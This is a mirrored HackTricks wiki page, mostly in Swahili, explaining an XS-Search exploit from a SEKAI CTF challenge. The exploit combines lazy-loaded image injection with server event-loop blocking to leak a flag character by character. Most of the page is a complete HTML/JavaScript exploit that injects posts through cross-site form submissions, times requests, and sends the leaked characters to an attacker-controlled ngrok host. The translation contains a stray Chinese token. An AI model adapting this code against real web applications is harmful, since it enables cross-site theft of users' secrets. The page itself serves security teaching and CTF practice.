maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md

155 lines
4.8 KiB
Markdown
Raw Blame History

# Event Loop Blocking + Lazy images
{{#include ../../banners/hacktricks-training.md}}
Katika [**exploit hii**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45), [**@aszx87410**](https://twitter.com/aszx87410) anachanganya mbinu ya **lazy image side channel** kupitia sindano ya HTML na aina ya **event loop blocking technique** ili kuvuja herufi.
Hii ni **exploit tofauti kwa ajili ya changamoto ya CTF** ambayo tayari imejadiliwa katika ukurasa ufuatao. angalia kwa maelezo zaidi kuhusu changamoto:
{{#ref}}
connection-pool-example.md
{{#endref}}
Wazo nyuma ya exploit hii ni:
- Posti zinapakiwa kwa alfabeti
- **Mshambuliaji** anaweza **kuchanganya** **posti** inayoh开始 na **"A"**, kisha baadhi ya **HTML tag** (kama **`<canvas`** kubwa) itajaza sehemu kubwa ya **skrini** na baadhi ya **`<img lazy` tags** za mwisho ili kupakia vitu.
- Ikiwa badala ya "A" **mshambuliaji anachanganya posti hiyo hiyo lakini ikianza na "z".** **Posti** yenye **bendera** itaonekana **kwanza**, kisha **posti** iliyochanganywa itaonekana ikiwa na "z" ya awali na **canvas** kubwa. Kwa sababu posti yenye bendera ilionekana kwanza, canvas ya kwanza itachukua skrini yote na **`<img lazy`** tags za mwisho zilizochanganywa **hazitaonekana** kwenye skrini, hivyo **hazitapakiwa**.
- Kisha, **wakati** bot inapo **fikia** ukurasa, **mshambuliaji** atatuma **maombi ya fetch**.
- Ikiwa **picha** zilizochanganywa katika posti zinapakiwa, maombi haya ya **fetch** yatakuwa **marefu**, hivyo mshambuliaji anajua kwamba **posti iko kabla ya bendera** (kwa alfabeti).
- Ikiwa maombi ya **fetch** ni **haraka**, inamaanisha kwamba **posti** iko **baada** ya bendera kwa **alfabeti**.
Hebu tuangalie msimbo:
```html
<!DOCTYPE html>
<html>
<!--
The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
If images are loading, the request to "/" is slower, otherwise faster.
By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
We can use fetch to measure the request time.
-->
<body>
<button onclick="run()">start</button>
<!-- Inject post with payload -->
<form
id="f"
action="http://localhost:1234/create"
method="POST"
target="_blank">
<input id="inp" name="text" value="" />
</form>
<!-- Remove index -->
<form
id="f2"
action="http://localhost:1234/remove"
method="POST"
target="_blank">
<input id="inp2" name="index" value="" />
</form>
<script>
let flag = "SEKAI{"
const TARGET = "https://safelist.ctf.sekai.team"
f.action = TARGET + "/create"
f2.action = TARGET + "/remove"
const sleep = (ms) => new Promise((r) => setTimeout(r, ms))
// Function to leak info to attacker
const send = (data) => fetch("http://server.ngrok.io?d=" + data)
const charset = "abcdefghijklmnopqrstuvwxyz".split("")
// start exploit
let count = 0
setTimeout(async () => {
let L = 0
let R = charset.length - 1
// I have omited code here as apparently it wasn't necesary
// fallback to linerar since I am not familiar with binary search lol
for (let i = R; i >= L; i--) {
let c = charset[i]
send("try_" + flag + c)
const found = await testChar(flag + c)
if (found) {
send("found: " + flag + c)
flag += c
break
}
}
}, 0)
async function testChar(str) {
return new Promise((resolve) => {
/*
For 3350, you need to test it on your local to get this number.
The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
If starts with "A", the image should be loaded because it's in the threshold.
*/
// <canvas height="3350px"> is experimental and allow to show the injected
// images when the post injected is the first one but to hide them when
// the injected post is after the post with the flag
inp.value =
str +
'<br><canvas height="3350px"></canvas><br>' +
Array.from({ length: 20 })
.map((_, i) => `<img loading=lazy src=/?${i}>`)
.join("")
f.submit()
setTimeout(() => {
run(str, resolve)
}, 500)
})
}
async function run(str, resolve) {
// Open posts page 5 times
for (let i = 1; i <= 5; i++) {
window.open(TARGET)
}
let t = 0
const round = 30 //Lets time 30 requests
setTimeout(async () => {
// Send 30 requests and time each
for (let i = 0; i < round; i++) {
let s = performance.now()
await fetch(TARGET + "/?test", {
mode: "no-cors",
}).catch((err) => 1)
let end = performance.now()
t += end - s
console.log(end - s)
}
const avg = t / round
// Send info about how much time it took
send(str + "," + t + "," + "avg:" + avg)
/*
I get this threshold(1000ms) by trying multiple times on remote admin bot
for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
*/
const isFound = t >= 1000
if (isFound) {
inp2.value = "0"
} else {
inp2.value = "1"
}
// remember to delete the post to not break our leak oracle
f2.submit()
setTimeout(() => {
resolve(isFound)
}, 200)
}, 200)
}
</script>
</body>
</html>
```
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink